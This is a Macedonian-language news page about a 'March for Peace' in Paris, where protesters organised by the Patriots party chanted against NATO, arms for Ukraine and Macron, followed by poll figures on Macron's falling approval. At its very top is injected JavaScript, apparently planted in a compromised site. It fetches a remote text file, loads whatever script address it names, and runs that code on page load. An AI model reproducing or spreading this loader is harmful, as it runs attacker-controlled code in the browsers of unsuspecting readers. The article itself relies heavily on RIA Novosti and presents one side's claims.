;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Марш за мир во Париз: Не ја сакаме војната на Макрон, да го напуштиме НАТО! - Антропол
АктуелноИнтернационално

Марш за мир во Париз: Не ја сакаме војната на Макрон, да го напуштиме НАТО!

Протестот наречен „Марш за мир“ беше во близина на луксембуршката палата, а според проценките на собирот присуствуваа неколку илјади луѓе.

Учесниците на протестот скандираа „Да го напуштиме НАТО!“, „Макрон, не ја сакаме твојата војна“, „Макрон во пензија!“, „Урсула, не те сакаме!“

Организатор беше организацијата „Патриот“ кој се противи на испораките на оружје за Украина и се залага за излегување на Франција од НАТО.

Еден од учесниците на „Маршот за мир“ изјави дека неговата земја одамна ја изгубила независноста во однос на одлучувањето.

„Гледајќи го сето она што се случува, невозможно е да останете дома и да не правите ништо. Не треба да и даваме оружје на Украина за да го поттикне овој конфликт, треба да започнеме преговори. Франција го загуби својот суверенитет. Таа веќе не е слободна. Нас ни е јасно дека со земјите од ЕУ владеат САД. Нашата слобода е загрозена. Франција има огромен надворешен долг, веќе не може да се однесува слободно а САД го поттикнува тоа. Русија реагира како што треба. Донбас е бомбардиран со години“, рече учесник на митингот.

Како што изјави претходно за РИА Новости шефот на партијата „Патриоти“, Флоријан Филип, сè повеќе Французи почнаа да ја разбираат не само природата на конфликтот во Украина, туку и фактот дека политиката на земјите од ЕУ е насочена кон служење на интересите на Америка.

Макрон веќе никој не го сака

Сите овие протеси и незадоволство придонесуваат популарноста на францускиот претседател Емануел Макрон да падне на 28 отсто овој месец, што е најниско ниво од почетокот на 2019 година од крајот на кризата предизвикана од бунтот на „Жолтите елеци“, чии протести подоцна се претворија во општо незадоволството на граѓаните од политиката на претседателот, за кој тврдат дека ги фаворизира богатите и големите компании. Причината за дополнителниот пад на поддршката е и многу непопуларната реформа на пензискиот систем.

Само 28 отсто од граѓаните се задоволни од шефот на државата, четири отсто помалку од минатиот месец, додека 70 отсто се незадоволни, покажува истражувањето спроведено во периодот од 9 до 16 март, пренесува „Фигаро“.